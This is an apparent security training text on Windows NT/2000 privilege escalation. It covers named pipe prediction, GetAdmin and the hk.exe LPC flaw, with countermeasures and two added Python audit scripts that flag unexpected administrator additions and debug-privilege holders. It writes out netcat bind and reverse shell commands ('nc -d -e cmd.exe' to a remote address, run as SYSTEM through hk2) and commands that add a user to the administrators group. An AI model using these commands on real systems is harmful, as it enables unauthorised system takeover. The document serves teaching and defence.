Privilege Escalation
If an attacker gains access to the network using a non-admin user account, the next step is to gain higher privileges, up to those of an administrator.
This is called privilege escalation.
Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the account in use to one with greater privileges, such as that of an administrator. For example, if the attacker has access to a W2K SP1 server, he can run a tool such as ERunAs2X.exe to escalate his privileges to that of SYSTEM by using "nc.exe -l -p 50000 -d -e cmd.exe". Note this can also be used remotely.
For instance, the named pipes prediction flaw in Windows 2000 allows interactively logged-on users to impersonate the SYSTEM account and execute arbitrary programs with those privileges. By reading the Registry key HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent, an attacker can anticipate the next named pipe and create the pipe before the SCM creates a pipe with the same name. When a new service is started, it connects to this malicious pipe. When the attacker instructs the SCM to start an arbitrary service that runs with high privileges (such as Clip Book, which runs as SYSTEM), the SCM connects the service to the malicious pipe. Run c:\>PipeUpAdmin. The program then adds the user to the local Administrators group. The attacker can conclude his privilege escalation by logging out and then logging in.
Countermeasure
General privilege escalation countermeasures include restricting interactive logons and access to system programs that users do not require, such as cmd.exe, and auditing account logon events (success, failure), privilege use (success, failure) and system events (success, failure).
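The auditing countermeasure is only useful if someone reviews the result. The following added example (not part of the original text) scans exported security events for additions to the local Administrators group made by a subject that is not on an approved list. The JSON-lines layout, the approved SID and the sample records are assumptions constructed for illustration; 4732 and 636 are the current and NT/2000-era event IDs for a member being added to a local group.

```python
import json

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of the built-in Administrators group
MEMBER_ADDED_IDS = {4732, 636}        # member added to a local group (current / NT-2000-era ID)
# Assumption: the only account allowed to change local group membership at this site.
APPROVED_SUBJECTS = {"S-1-5-21-1111111111-2222222222-3333333333-500"}

# Constructed JSON-lines export; field names follow the event's EventData
# (SubjectUserSid, MemberSid, TargetSid). Not taken from a real log.
SAMPLE_LOG = """\
{"EventID": 4624, "TargetUserSid": "S-1-5-21-1111111111-2222222222-3333333333-1104"}
{"EventID": 4732, "SubjectUserSid": "S-1-5-21-1111111111-2222222222-3333333333-500", "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1107", "TargetSid": "S-1-5-32-544"}
{"EventID": 4732, "SubjectUserSid": "S-1-5-18", "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1104", "TargetSid": "S-1-5-32-544"}
{"EventID": 4732, "SubjectUserSid": "S-1-5-18", "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1104", "TargetSid": "S-1-5-32-545"}
truncated line {"EventID":
"""

def suspicious_admin_additions(log_text, approved=APPROVED_SUBJECTS):
    """Return (subject_sid, member_sid) for each Administrators addition
    made by a subject that is not on the approved list."""
    findings = []
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue                  # skip damaged records rather than abort the scan
        if not isinstance(event, dict):
            continue
        if event.get("EventID") not in MEMBER_ADDED_IDS:
            continue
        if event.get("TargetSid") != ADMINISTRATORS_SID:
            continue                  # membership change in a different local group
        subject = event.get("SubjectUserSid")
        if subject not in approved:
            findings.append((subject, event.get("MemberSid")))
    return findings

if __name__ == "__main__":
    for subject, member in suspicious_admin_additions(SAMPLE_LOG):
        print(f"Administrators gained {member}; change made by {subject}")
```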
Tool: GetAdmin
GetAdmin.exe is a small program that adds a user to the local administrators group.
It uses a low-level NT kernel routine to set a global flag allowing access to any running process.
You need to log on to the server console to execute the program.
GetAdmin.exe is run from the command line or from a browser.
This only works with NT 4.0 Service Pack 3.
On an NT machine, GetAdmin attaches to the WinLogon process, which runs in the system's security context, and makes standard API calls that will add the specified user to the administrators group. This is a classic instance of privilege escalation. Though Microsoft issued a hotfix, any user who has been granted the "Debug Programs" right will always be able to run the program successfully. This is possible because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and ideally should only be granted to fully trusted users.
Similarly, if GetAdmin.exe is run by a user who is already a member of the administrators local group, it will continue to work (even after applying the hotfix). This is possible because members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed. GetAdmin.exe cannot be used remotely and must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). However, the tool does not function on a backup domain controller (BDC) because the account database on a BDC is read-only. Therefore, the only way to use GetAdmin to modify a domain account database is to log on to a primary domain controller and run the utility locally on the PDC.
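Because the hotfix does not help once "Debug Programs" has been granted too widely, it is worth checking who holds that right. The following added example (not part of the original text) parses the [Privilege Rights] section of a user-rights export produced by `secedit /export /cfg rights.inf /areas USER_RIGHTS` and lists every holder of SeDebugPrivilege other than the Administrators group. The file name, the sample content and the account "peter" (borrowed from the hk.exe listing on this page) are constructed for illustration.

```python
import re

ADMINISTRATORS = "S-1-5-32-544"   # well-known SID of the built-in Administrators group

# Constructed sample of a secedit user-rights export (not taken from a real host).
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1104,peter
SeShutdownPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""

def parse_privilege_rights(inf_text):
    """Return {privilege: [principal, ...]} from the [Privilege Rights] section."""
    rights, section = {}, None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).lower()
            continue
        if section == "privilege rights" and "=" in line:
            name, _, value = line.partition("=")
            # SIDs carry a leading '*'; account names are written without it.
            rights[name.strip()] = [p.strip().lstrip("*")
                                    for p in value.split(",") if p.strip()]
    return rights

def unexpected_holders(rights, privilege="SeDebugPrivilege", allowed=(ADMINISTRATORS,)):
    """Principals holding `privilege` that are not on the allow-list."""
    return [p for p in rights.get(privilege, []) if p not in allowed]

if __name__ == "__main__":
    for who in unexpected_holders(parse_privilege_rights(SAMPLE_INF)):
        print("Debug Programs granted outside Administrators:", who)
```

A real export is normally UTF-16 encoded, so open it with `encoding="utf-16"` before passing the text to `parse_privilege_rights`.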
Tool: hk.exe
The hk.exe utility exposes a Local Procedure Call flaw in NT.
A non-admin user can be escalated to the administrators group using hk.exe.
C:\>net localgroup administrators peter /add
Access Denied
------------------------------------------------
c:\>hk net localgroup administrators peter /add
lsass pid & tid are: 47 -48
NtImpersonateClientOfPort succeeded
hk.exe takes advantage of the vulnerability in the API call to NT_Impersonate and allows the user to get the token of a kernel thread (LSASS or equivalent). The tool is a command-line executable, and the user just needs to key in hk followed by any command he would want to run if he had NT Authority/System level privileges. Note that this is above the Administrator account privileges.
nc -l -p 23
nc -d -e cmd.exe 192.168.xx.xx 23 (Done on the active netcat running on the webserver)
hk2 nc -d -e cmd.exe 192.168.xx.xx 23
lsass pid & tid are: 50 - 53
The NtImpersonateClientOfPort call succeeds because of the way port communication takes place between the client system and the server. During a conversation, although the server receives a new handle from NtAcceptConnectPort for each client that connects, it usually does not use that handle when communicating with its clients. Instead, it uses the original handle it got from the NtCreatePort call.